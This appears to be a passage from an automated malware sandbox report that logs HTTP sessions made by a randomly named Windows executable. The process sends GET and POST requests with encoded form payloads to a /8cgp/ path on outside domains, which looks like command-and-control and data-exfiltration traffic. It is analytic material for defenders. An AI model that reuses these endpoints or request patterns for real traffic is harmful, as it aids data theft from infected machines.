                                                                    Data Ascii: Vr19355xD3eYNjmlNgmR6p82lKx2QTFmJhwAvNZw6obT9MHhonN2b+cNHqZ/WeUpQ+nOqZ2PWJGilAgqdNcQJ/qwtm7zHHpX+ubMyndaH4AhcyJDCWrhIY2y9r7GZ/1zpCvK/xKVOV95lUF1Xz26SDdkGigKrUlDDitCfw43M6h3CGl2SCCZ+eFzpieHl898oH5Lyv+FnVIV8MDpgE+OlWxneFKGTTkKZqsYBRXC8O+w8aHH/fK
                                                                    Apr 24, 2024 12:29:41.832473040 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.11.2050265157.7.107.63807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:43.581357002 CEST396OUTGET /8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.a-two-spa-salon.com
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Apr 24, 2024 12:29:44.049843073 CEST507INHTTP/1.1 301 Moved Permanently
                                                                    Date: Wed, 24 Apr 2024 10:29:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    X-Redirect-By: WordPress
                                                                    Location: http://a-two-spa-salon.com/8cgp/?Xh9lX=4GuIeZ5/FrknERHMXrNh6P2zNKgrxoOsX8fLf9+FvaUhJPhi6YvqajOryTNmV9FzTg+fg8zx27kOMjM9ARbv/mO9DinSc6hkOsxZ/ooW+MqGv6LVFVbELEQ=&QDnH=ERXP8
                                                                    X-Cache: MISS


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.11.2050266203.161.49.193807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:29:57.648444891 CEST659OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 202
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 77 2b 66 37 66 63 50 63 71 63 33 4b 61 47 67 69 69 43 32 63 65 6a 43 7a 33 48 73 4e 75 45 4c 70 64 6b 67 77 43 32 70 49 71 57 35 6e 33 56 68 74 67 6d 42 76 42 59 35 65 6c 32 58 38 56 49 53 36 6f 36 38 48 6a 2f 45 57 76 48 39 4b 55 6c 32 56 6d 54 52 66 55 5a 36 4d 77 64 41 50 4f 54 6c 2b 42 77 4e 48 4f 46 51 56 65 71 48 73 74 4f 4e 44 64 55 57 51 75 4a 7a 75 37 4b 53 6d 69 46 70 4f 5a 49 76 6c 61 39 31 55 6f 6b 62 62 4b 4d 52 34 51 65 54 6f 43 37 66 2f 31 47 2f 35 66 76 77 51 56 41 74 6f 6c 44 6c 69 4f 6f 44 57 78 31 70 31 75 70 62 62 57 39 71 57 32 4f 39 51 49 75 2f 63 44 67 3d 3d
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KaGgiiC2cejCz3HsNuELpdkgwC2pIqW5n3VhtgmBvBY5el2X8VIS6o68Hj/EWvH9KUl2VmTRfUZ6MwdAPOTl+BwNHOFQVeqHstONDdUWQuJzu7KSmiFpOZIvla91UokbbKMR4QeToC7f/1G/5fvwQVAtolDliOoDWx1p1upbbW9qW2O9QIu/cDg==
                                                                    Apr 24, 2024 12:29:58.030041933 CEST533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:29:57 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.11.2050267203.161.49.193807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:00.350575924 CEST999OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 77 2b 66 37 66 63 50 63 71 63 33 4b 63 6d 51 69 6a 6c 43 63 63 44 43 77 72 33 73 4e 6b 6b 4c 6c 64 6b 63 77 43 79 52 59 71 6b 64 6e 33 30 52 74 68 6e 42 76 47 59 35 65 39 6d 58 35 62 6f 54 32 6f 36 41 68 6a 37 45 57 76 48 70 4b 61 32 75 56 6b 6a 52 65 48 5a 36 4e 78 64 41 53 59 54 6c 6f 42 77 42 62 4f 45 30 56 65 36 72 73 73 4d 56 44 5a 46 57 66 6b 4a 7a 6f 73 36 53 6e 73 6c 70 45 5a 49 79 59 61 38 4d 68 6f 52 62 62 4b 74 78 34 52 65 54 33 4b 4c 66 38 71 57 2b 36 53 64 31 38 4f 77 42 36 6a 55 46 43 4a 38 76 73 36 6c 35 4b 72 6f 4f 35 50 76 61 38 2f 63 49 4d 4b 66 76 51 63 47 4c 42 66 73 34 36 38 5a 39 73 75 46 38 4f 64 35 51 73 77 51 4c 61 75 50 51 62 4e 73 61 31 75 62 56 4c 63 56 68 38 4d 4d 59 63 59 34 51 76 78 57 39 4f 63 64 61 36 73 2f 45 6a 4e 4d 67 4c 46 70 6c 52 62 54 70 4f 2b 48 68 4d 55 47 6e 58 56 4f 2f 7a 38 34 6c 6d 75 78 61 45 4f 53 43 42 48 61 6b 53 62 2b 6d 44 79 73 4c 2b 68 44 55 43 74 66 4e 7a 57 77 55 4b 6a 62 50 44 4e 7a 44 78 6d 76 59 38 59 7a 49 4e 77 2b 78 61 2f 43 42 54 46 73 4a 73 72 37 4b 59 64 33 2f 73 62 6d 6f 68 7a 38 6c 55 76 37 6c 37 73 35 2b 50 37 44 59 72 37 4c 4e 39 6e 38 32 79 59 71 4d 59 4e 79 44 34 6f 6d 66 75 47 6f 66 61 4a 44 62 6d 59 36 6b 33 51 34 5a 38 6f 47 65 44 33 43 53 6e 30 2b 75 68 78 44 57 57 71 79 46 4d 34 74 56 50 5a 4b 45 79 57 32 57 30 69 52 39 61 6e 42 74 39 58 77 4b 48 59 6e 43 6d 4b 5a 4d 68 4c 4f 67 38 49 2b 48 5a 52 33 49 49 49 75 6d 63 5a 6e 50 6e 66 30 75 62 4f 37 44 6d 39 58 6f 78 73 55 50 67 72 74 4c 5a 6e 32 4a 61 45 62 73 39 77 4e 7a 36 47 57 4d 34 56 65 79 50 42 2b 44 46 6d 70 4f 53 62 31 6d 63 62 66 44 33 5a 71 6b 3d
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KcmQijlCccDCwr3sNkkLldkcwCyRYqkdn30RthnBvGY5e9mX5boT2o6Ahj7EWvHpKa2uVkjReHZ6NxdASYTloBwBbOE0Ve6rssMVDZFWfkJzos6SnslpEZIyYa8MhoRbbKtx4ReT3KLf8qW+6Sd18OwB6jUFCJ8vs6l5KroO5Pva8/cIMKfvQcGLBfs468Z9suF8Od5QswQLauPQbNsa1ubVLcVh8MMYcY4QvxW9Ocda6s/EjNMgLFplRbTpO+HhMUGnXVO/z84lmuxaEOSCBHakSb+mDysL+hDUCtfNzWwUKjbPDNzDxmvY8YzINw+xa/CBTFsJsr7KYd3/sbmohz8lUv7l7s5+P7DYr7LN9n82yYqMYNyD4omfuGofaJDbmY6k3Q4Z8oGeD3CSn0+uhxDWWqyFM4tVPZKEyW2W0iR9anBt9XwKHYnCmKZMhLOg8I+HZR3IIIumcZnPnf0ubO7Dm9XoxsUPgrtLZn2JaEbs9wNz6GWM4VeyPB+DFmpOSb1mcbfD3Zqk=
                                                                    Apr 24, 2024 12:30:00.537965059 CEST533INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:30:00 GMT
                                                                    Server: Apache
                                                                    Content-Length: 389
                                                                    Connection: close
                                                                    Content-Type: text/html
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.11.2050268203.161.49.193807240C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:30:03.054003000 CEST3867OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.techfun.info
                                                                    Origin: http://www.techfun.info
                                                                    Referer: http://www.techfun.info/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 77 2b 66 37 66 63 50 63 71 63 33 4b 63 6d 51 69 6a 6c 43 63 63 44 43 77 72 33 73 4e 6b 6b 4c 6c 64 6b 63 77 43 79 52 59 71 6b 56 6e 30 43 46 74 67 45 70 76 48 59 35 65 31 47 58 34 62 6f 53 73 6f 36 6f 39 6a 37 41 73 76 43 74 4b 55 46 6d 56 6b 52 35 65 51 5a 36 4f 6f 74 41 51 4f 54 6b 30 42 77 4e 31 4f 41 6b 76 65 71 76 73 74 4f 39 44 64 79 4b 51 6e 5a 7a 75 73 36 54 6d 39 31 6f 37 5a 49 33 54 61 39 77 68 6f 58 62 62 59 75 4a 34 54 50 54 33 48 37 66 37 68 32 2b 4c 59 39 31 5a 4f 77 56 45 6a 55 45 39 4a 35 4c 73 36 6d 42 4b 71 76 62 76 50 50 61 38 33 38 49 50 4f 66 69 5a 63 47 57 53 66 74 38 36 38 62 4e 73 75 6c 38 4f 4c 49 51 72 7a 77 4c 55 71 50 51 4d 61 38 57 48 75 66 45 79 63 55 46 38 4d 38 6b 63 4b 62 49 76 69 43 52 4f 53 64 62 63 6f 2f 45 72 57 38 67 58 46 70 30 74 62 54 4a 30 2b 45 74 4d 58 6a 7a 58 44 37 66 30 71 49 6c 6b 68 52 61 72 63 69 4f 7a 48 61 55 47 62 2b 6d 54 79 74 50 2b 68 7a 45 43 73 64 31 77 63 77 55 4a 32 4c 50 73 45 54 50 2f 6d 75 30 30 59 79 67 64 77 39 64 61 35 69 42 54 56 37 31 76 68 4c 4b 62 52 58 2f 45 66 6d 70 33 7a 38 70 2b 76 2f 31 4e 73 4a 69 50 37 33 30 72 2f 62 4e 36 68 63 32 4d 44 36 4d 65 61 69 44 34 6f 6d 69 4b 47 6f 54 61 4a 52 4c 6d 65 49 4d 33 46 35 5a 38 37 57 65 4a 33 43 54 68 30 2b 69 61 78 44 65 34 71 7a 31 32 34 76 35 50 5a 59 38 79 52 33 57 7a 6e 68 38 65 6a 42 74 6d 49 41 48 52 59 6e 75 75 4b 5a 64 63 49 35 59 38 4a 2b 33 5a 56 33 49 50 43 75 6d 58 65 6e 4f 6b 62 30 54 4b 4f 37 66 51 39 54 6f 59 73 55 33 67 6f 36 6d 2b 30 33 68 48 63 39 73 58 2f 2f 7a 73 50 41 45 34 57 75 6d 33 41 4d 2f 63 6b 2b 47 58 62 58 62 64 41 64 72 67 45 4e 61 7a 69 42 4b 34 56 52 4b 66 48 6b 72 64 53 72 6b 41 2f 6f 34 4b 66 36 57 56 51 65 70 6a 56 58 34 6a 55 76 38 44 76 32 38 33 45 4e 67 66 55 61 46 2f 4b 45 4e 42 4d 33 62 44 49 53 57 76 41 47 4e 2f 76 53 72 76 43 71 63 43 37 43 32 41 70 6d 35 7a 4a 38 79 5a 51 31 39 69 48 67 6f 30 4f 6c 72 2f 50 6f 68 2f 51 34 56 6f 79 54 4b 50 58 75 4d 36 68 38 64 51 75 7a 33 36 74 4e 31 36 74 61 35 53 34 31 4b 49 47 4d 5a 63 48 50 70 57 68 4a 33 73 33 68 57 39 6d 50 4a 67 6b 35 35 6d 49 54 32 48 74 56 46 68 50 49 72 2b 38 76 69 70 49 43 53 50 52 58 55 58 34 71 55 53 6a 66 41 6e 5a 72 6a 73 75 32 52 38 33 2b 70 75 58 64 43 70 35 68 51 30 4c 4a 53 4c 6f 38 45 69 6b 34 58 69 4e 62 32 6d 47 4d 62 42 6d 54 2b 49 30 7a 37 63 4a 64 57 43 59 4c 65 6b 31 61 52 6b 6b 57 34 41 64 68 66 59 6b 30 73 6d 78 71 37 79 72 41 38 37 35 74 65 30 71 42 73 37 6b 33 57 37 4e 45 6b 42 6c 79 50 31 57 71 76 69 67 42 5a 59 66 6a 6a 59 56 55 30 30 4c 35 4e 6a 4b 6c 56 75 7a 58 7a 44 4c 73 38 4d 2b 49 2f 54 71 76 43 4f 68 69 34 41 53 64 6b 4d 67 46 2b 6c 70 69 66 46 31 6b 34 53 55 69 4d 4f 59 34 6b 31 6a 35 78 6a 47 6b 73 63 63 6a 77 76 57 65 51 4d 30 71 4f 33 41 36 44 33 75 46 4a 62 31 71 6e 62 32 31 61 62 6f 66 71 35 78 64 6a 33 2b 30 72 77 6d 69 53 48 35 5a 7a 30 54 74 74 4d 67 42 78 47 6d 6d 32 45 4c 32 4f 55 2f 62 49 35 62 34 4e 62 4f 52 51 30 33 32 39 42 42 48 55 37 39 4e 76 6c 53 4a 75 6c 76 52 65 6d 6c 5a 57 58 2f 4a 78 35 50 37 30 64 6e 77 4b 54 54 33 57 43 5a 64 69 62 54 5a 2f 67 4c 62 7a 73 41 38 59 63 55 2b 38 4c 4d 4f 37 37 4c 66 55 34 6c 55 4d 75 69 4d 67 49 4a 6c 57 46 7a 79 35 50 47 38 45 46 46 49 39 56 76 57 5a 57 35 41 72 43 4e 73 45 6c 6d 4b 7a 65 37 4f 6e 53 69 79 73 67 4f 76 68 35 71 45 43 48 6b 75 63 73 4f 64 30 34 50 49 71 75 79 44 4f 2b 41 58 68 4d 50 78 62 7a 33 32 54 7a 71 37 39 62 6c 54 2b 6b 49 45 4a 6a 47 72 76 73 58 34 76 64 32 66 6d 52 58 39 6f 43 54 64 2f 70 2f 6e 79 4c 77 36 63 54 33 54 62 73 75 74 6c 35 55 56 48 50 32 57 68 72 79 45 34 34 38 6e 69 57 6e 32 72 68 75 2f 74 6a 5a 51 6a 66 79 70 4d 44 61 42 69 4a 6b 57 38 63 39 4f 4d 30 51 73 58 59 2b 44 44 6d 45 75 57 39 53 73 47 64 57 6e 43 2f 6d 47 6b 7a 32 2f 68 50 49 74 31 41 42 34 69 46 44 6f 55 4f 49 73 30 63 66 41 54 57 74 32 55 42 37 69 45 76 44 62 4d 55 4e 2f 4c 68 62 4d 72 34 54 54 55 74 5a 50 35 4e 37 79 7a 75 44 39 35 30 33 31 30 68 36 4b 51 62 54 68 79 63 73 46 66 52 4d 4c 6d 48 6b 61 70 71 35 6a 70 6d 59 79 71 4f 4c 4e 4c 44 48 72 4c 78 48 52 6f 77 53 76 38 64 4e 55 48 36 78
                                                                    Data Ascii: Xh9lX=w+f7fcPcqc3KcmQijlCccDCwr3sNkkLldkcwCyRYqkVn0CFtgEpvHY5e1GX4boSso6o9j7AsvCtKUFmVkR5eQZ6OotAQOTk0BwN1OAkveqvstO9DdyKQnZzus6Tm91o7ZI3Ta9whoXbbYuJ4TPT3H7f7h2+LY91ZOwVEjUE9J5Ls6mBKqvbvPPa838IPOfiZcGWSft868bNsul8OLIQrzwLUqPQMa8WHufEycUF8M8kcKbIviCROSdbco/ErW8gXFp0tbTJ0+EtMXjzXD7f0qIlkhRarciOzHaUGb+mTytP+hzECsd1wcwUJ2LPsETP/mu00Yygdw9da5iBTV71vhLKbRX/Efmp3z8p+v/1NsJiP730r/bN6hc2MD6MeaiD4omiKGoTaJRLmeIM3F5Z87WeJ3CTh0+iaxDe4qz124v5PZY8yR3Wznh8ejBtmIAHRYnuuKZdcI5Y8J+3ZV3IPCumXenOkb0TKO7fQ9ToYsU3go6m+03hHc9sX//zsPAE4Wum3AM/ck+GXbXbdAdrgENaziBK4VRKfHkrdSrkA/o4Kf6WVQepjVX4jUv8Dv283ENgfUaF/KENBM3bDISWvAGN/vSrvCqcC7C2Apm5zJ8yZQ19iHgo0Olr/Poh/Q4VoyTKPXuM6h8dQuz36tN16ta5S41KIGMZcHPpWhJ3s3hW9mPJgk55mIT2HtVFhPIr+8vipICSPRXUX4qUSjfAnZrjsu2R83+puXdCp5hQ0LJSLo8Eik4XiNb2mGMbBmT+I0z7cJdWCYLek1aRkkW4AdhfYk0smxq7yrA875te0qBs7k3W7NEkBlyP1WqvigBZYfjjYVU00L5NjKlVuzXzDLs8M+I/TqvCOhi4ASdkMgF+lpifF1k4SUiMOY4k1j5xjGksccjwvWeQM0qO3A6D3uFJb1qnb21abofq5xdj3+0rwmiSH5Zz0TttMgBxGmm2EL2OU/bI5b4NbORQ0329BBHU79NvlSJulvRemlZWX/Jx5P70dnwKTT3WCZdibTZ/gLbzsA8YcU+8LMO77LfU4lUMuiMgIJlWFzy5PG8EFFI9VvWZW5ArCNsElmKze7OnSiysgOvh5qECHkucsOd04PIquyDO+AXhMPxbz32Tzq79blT+kIEJjGrvsX4vd2fmRX9oCTd/p/nyLw6cT3Tbsutl5UVHP2WhryE448niWn2rhu/tjZQjfypMDaBiJkW8c9OM0QsXY+DDmEuW9SsGdWnC/mGkz2/hPIt1AB4iFDoUOIs0cfATWt2UB7iEvDbMUN/LhbMr4TTUtZP5N7yzuD950310h6KQbThycsFfRMLmHkapq5jpmYyqOLNLDHrLxHRowSv8dNUH6xqOqL7YuLIcfsw0Emk9BHaO8yMKXLKRMWO/fdgMyirEPFlEo9iIJx8tMi7zeM83nDxxVVGyndm1oMiPSVxkasaGiEKVN6ZzsnCBs4xFv5bZydVuJdEe+bFjeiN/FEyAiAMKs/sYJ5KChhI1aNqjiO4gB2/PdmYJ1oULoooofnApFs6lIIUWa5lXUxbE6XdB6XmQgZsuP3ETZeN3VALkM302Hc/hoEUdrgqs5EmqE4fMVvR4XQIN9X82ii